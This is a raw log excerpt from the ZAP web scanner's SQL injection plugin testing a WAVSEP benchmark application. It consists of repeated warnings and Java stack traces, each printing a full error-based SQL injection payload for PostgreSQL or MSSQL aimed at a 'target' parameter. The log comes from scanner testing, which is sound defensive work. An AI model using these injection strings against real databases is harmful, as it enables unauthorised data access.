org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680641 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7166=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7166=7166) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('geQz'='geQz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7166=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7166=7166) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('geQz'='geQz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680641 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 6648=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6648=6648) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- pEFL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6648=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6648=6648) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- pEFL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680643 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 4597=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4597=4597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (6382=6382] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4597=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4597=4597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (6382=6382 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680643 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1870=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1870=1870) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'Mzhp'='Mzhp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1870=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1870=1870) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'Mzhp'='Mzhp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680644 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3630=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3630=3630) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3630=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3630=3630) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680645 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 6104=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6104=6104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('ARMk'='ARMk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6104=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6104=6104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('ARMk'='ARMk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680646 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 3987=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3987=3987) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 3987=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3987=3987) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680647 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1866=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1866=1866) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- KaMJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1866=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1866=1866) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- KaMJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680647 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 3534=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3534=3534) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'EJRo'='EJRo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3534=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3534=3534) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'EJRo'='EJRo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680648 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8627=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8627=8627) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4657=4657] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8627=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8627=8627) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4657=4657 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680648 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 3871=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3871=3871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 3871=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3871=3871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680649 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5317=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5317=5317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5317=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5317=5317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at 